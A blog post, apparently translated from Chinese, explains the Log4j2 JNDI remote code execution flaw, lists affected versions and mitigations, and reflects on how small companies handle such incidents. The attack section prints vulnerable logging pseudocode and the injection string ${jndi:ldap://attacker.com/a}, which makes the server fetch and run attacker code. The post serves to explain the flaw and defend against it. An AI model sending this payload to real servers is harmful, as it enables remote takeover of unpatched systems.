Background of the event

On December 10, I saw that some people in my circle of friends had been modifying and putting the system online all night. Then, I saw the official report issued by Ali Cloud security and Tencent security department: “Apache Log4j2 has a remote code execution vulnerability”, and the vulnerability has been made public.

The old project uses log4j and the new project uses logback. Then I saw the news in my circle of friends.

As an epic event, an urgent fix was inevitable. As a programmer, if you see this message and can’t even check the system, you are really not a qualified programmer.

After this incident, not only to watch the fun, but also to think about how as a small company can avoid, prevent, and prepare for this kind of Bug.

Vulnerability describes

Apache Log4j2 is an excellent Java logging framework, which is on par with Logback. A number of major open source frameworks have adopted Log4j2, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink and others. Therefore, such a underlying framework problems, impact can be imagined.

Vulnerability information: Apache Log4j 2.15.0-RC1 has a vulnerability bypass, and must be updated to Apache Log4j 2.15.0-rc2.

Impact: 2.0 <= Apache log4j2 <= 2.14.1

Latest fix: github.com/apache/logg…

remedy

Plan 1: Upgrade the version and release the system;

Option II: Temporary relief:

  • Modify JVM parameters, set-Dlog4j2.formatMsgNoLookups=true.
  • Added under the classpath of the project involved in the vulnerabilitylog4j2.component.propertiesConfiguration file and add configuration itemslog4j2.formatMsgNoLookups=true.
  • Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true.

Attack principle

Examples of attack pseudocode:

import org.apache.log4j.Logger; import java.io.*; import java.sql.SQLException; import java.util.*; public class VulnerableLog4jExampleHandler implements HttpHandler { static Logger log = Logger.getLogger(log4jExample.class.getName()); /** * Example pseudocode: a simple HTTP endpoint where User Agent information is read and logged; */ public void Handle (HttpExchange HE) throws IOException {// Obtaining user-Agent information String userAgent = he.getRequestHeader("user-agent"); // This line of logging code triggers the RCE by logging HTTP user proxy headers controlled by the attacker. / / the attacker can set their the user-agent header to ${jndi:ldap://attacker.com/a} the info (" Request User Agent: "+ userAgent); String response = "<h1>Hello There, " + userAgent + "! </h1>"; he.sendResponseHeaders(200, response.length()); OutputStream os = he.getResponseBody(); os.write(response.getBytes()); os.close(); }}Copy the code

Basic attack steps based on the above code:

  • Request (or interface), the corresponding HTTP endpoint carry attack code in the requested information (for example, in the user-agent carrying ${jndi:ldap://attacker.com/a});
  • When the server performs logging via Log4j2, the log contains the information based onJNDIandLDAPMalicious load of${jndi:ldap://attacker.com/a}, includingattacker.comIs the address controlled by the attacker.
  • The logging operation triggers a request to an address controlled by the attacker.
  • Executable malicious code is returned in response to the request and injected into the server process. For example, return, attacker.com/Attack.clas… .
  • The script is then executed to control the server.

The reappearance of Tencent security experts is as follows:

What can small business programmers do?

The vulnerabilities and solutions have been discussed in detail above, and the problems have been basically solved. In large Internet enterprises, there is a special security operation department to monitor and scan these vulnerabilities. But in small companies, there’s obviously no such thing.

So, what do we do? At the same time, as an experience of the event, have you thought about some other issues reflected in the event?

First, did you get the news in the first place?

In large companies, security departments are the first to notify when such vulnerabilities are discovered. But in a small business, where there is no security department, how do you get word of a breach?

For example, the company I work for has no security department, but it is almost the first time to learn the news of the vulnerability and conduct system investigation.

If, as a programmer, news of a bug has been out for a long time and you don’t know it, you might want to rethink the quality of your social media and attention to tech buzz.

How you get the first-hand information in your circle depends and reflects where you are in the social or tech world.

Second, have they turned a deaf ear?

A lot of friends may also see the bug news, but also look at the excitement, and then what to do, the system has a bug on the bug bai ~

If this is true of you, or your team, you really need to examine your professionalism.

Many of us may feel that we are good, that we are underappreciated, that we are underpaid, that we are being mistreated… Well, if you look at your reaction to this, you’ll probably know if you’ve been mistreated.

Third, how to respond to emergencies?

Such an emergency is also a test of system operation and maintenance and team management, as well as a simulation exercise: everyone is developing the current business, and there is an unexpected Bug to be modified. How to operate the code with half of the change? Like a mass release?

First, what if I change half of the code? If all of your team’s code development is based on the master (trunk), you will inevitably be faced with the situation of submitting half-changed code, wanting to release it together, but not testing it.

Therefore, the management of code (how to branch, merge branches, and release branches to different environments from the trunk code) must start from the daily bits, and when something unexpected happens, it will not be a mess.

Second, what if you have a large number of projects to release? Of course, the oldest way is to manually release system by system. If there are many micro-services and applications, errors are easy to occur and time-consuming. This reminds us of the importance of building an automated release process.

Fourth, how to find system vulnerabilities?

Companies that have security departments regularly scan their systems for vulnerabilities, so companies that don’t have security departments are just sitting ducks?

There are ways to find bugs in your system. For example, pay close attention to the use of the framework version upgrade, the use of vulnerability scanning provided by the three parties (such as ali cloud server security scanning), communication with peers and other means.

summary

Any vulnerability to the software system may be fatal, we also need to treat carefully. How to deal with and react to loopholes is also a reflection of the professional quality of practitioners.

You will grow faster if you can learn and think more from each incident.

About the blogger: Author of the technology book SpringBoot Inside Technology, loves to delve into technology and writes technical articles.

Public account: “program new vision”, the blogger’s public account, welcome to follow ~

Technical exchange: Please contact the weibo user at Zhuan2quan

\